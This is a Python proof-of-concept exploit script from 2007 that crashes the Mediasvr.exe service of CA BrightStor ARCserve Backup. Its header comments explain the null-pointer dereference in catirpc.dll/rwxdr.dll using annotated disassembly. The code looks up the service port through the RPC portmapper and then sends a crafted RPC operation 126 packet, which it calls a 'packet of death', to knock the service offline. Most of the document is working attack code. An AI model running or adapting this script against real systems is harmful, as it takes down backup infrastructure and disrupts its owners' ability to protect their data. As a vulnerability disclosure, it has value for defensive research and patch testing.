#!/usr/bin/python # # Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll) # (Previously Unknown) # # There is an issue with RPC operation 126 and the imported cactirpc.dll # and rwxdr.dll. It looks as if Mediasvr.exe identifies a Bad Job Handle # as seen in its log file. # # Log Message: # asms_manager_job_enumerate_devices_1_svc(): Bad Job Handle. # # However, the process dies when trying to send an RPC response # for the bad job handle. This is caused be a null memory dereference. # Within cactirpc.dll, the xdr_rwpair function is called: # # Catirpc.dll:2E008A93 loc_2E008A93: # Catirpc.dll:2E008A93 mov ecx, [esi+10h] # Catirpc.dll:2E008A96 push ecx <- ECX is 0x0041B310 (nulls) # Catirpc.dll:2E008A97 push edi <- EDI is 0x009e2580 (nulls) # Catirpc.dll:2E008A98 call dword ptr [esi+14h] <-points to 0x2d6054f0 # Catirpc.dll:2E008A9B add esp, 8 (rwxdr.dll:xdr_rwpair) # Catirpc.dll:2E008A9E pop edi # Catirpc.dll:2E008A9F pop esi # Catirpc.dll:2E008AA0 pop ebx # Catirpc.dll:2E008AA1 retn # # rwxdr.dll:xdr_rwpair # .text:2D6054F0 public xdr_rwpair # .text:2D6054F0 xdr_rwpair proc near # .text:2D6054F0 # .text:2D6054F0 arg_0= dword ptr 4 # .text:2D6054F0 arg_4= dword ptr 8 # .text:2D6054F0 # .text:2D6054F0 push ebx # .text:2D6054F1 mov ebx, [esp+4+arg_4] <---puts 0x0041B310 # .text:2D6054F5 push esi # .text:2D6054F6 push edi # .text:2D6054F7 mov edi, [esp+0Ch+arg_0] <--- puts 0x009e2580 # .text:2D6054FB mov esi, [ebx] <---- EBX is 0x00000000 # .text:2D6054FD mov eax, [edi] <---- EDI is 0x00000000 # .text:2D6054FF test eax, eax # .text:2D605501 jnz short loc_2D605533 # .text:2D605503 mov eax, [esi+4] <---- ESI is set to 0x00000000 # # This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest # CA patches on Windows XP SP2 # # CA has been notified # # Author: M. Shirk # # (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com # # Use at your own Risk: You have been warned #------------------------------------------------------------------------ import os import sys import time import socket import struct #------------------------------------------------------------------------ #Start of RPC Packet rpc_packet="\x80\x00\x00\x5c\x6b\x9b\x72\xbc\x00\x00\x00\x00\x00\x00\x00\x02" #Program ID, and Operation 126 rpc_packet+="\x00\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x7e" #nulls after Operation rpc_packet+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" #4 more bytes of junk (ALL HAIL BEEF) rpc_packet+="\xde\xad\xbe\xef" # Need to get the port Mediasvr.exe is listening on rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00" #------------------------------------------------------------------------ def ExploitMediaSvr(target,port): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target, port)) sock.send(rpc_packet) sock.close() print '[+] Done...\n[+] Mediasvr.exe is dead\n[+] ... or it will die in a few seconds for you inpatient bastards\n' def GetMediaSvrPort(target): sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((target,111)) sock.send(rpc_portmap_req) rec = sock.recv(256) port1 = rec[-4] port2 = rec[-3] port3 = rec[-2] port4 = rec[-1] port1 = hex(ord(port1)) port2 = hex(ord(port2)) port3 = hex(ord(port3)) port4 = hex(ord(port4)) port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16)) port = int(port,16) print '[+] Sending TCP Packet of Death to Target: %s Port: %s' % (target,port) ExploitMediaSvr(target,port) if __name__=="__main__": try: target = sys.argv[1] except IndexError: print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)' print '[+] Author: Shirkdog' print '[+] Usage: %s \n' % sys.argv[0] sys.exit(-1) print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)' print '[+] Author: Shirkdog' GetMediaSvrPort(target)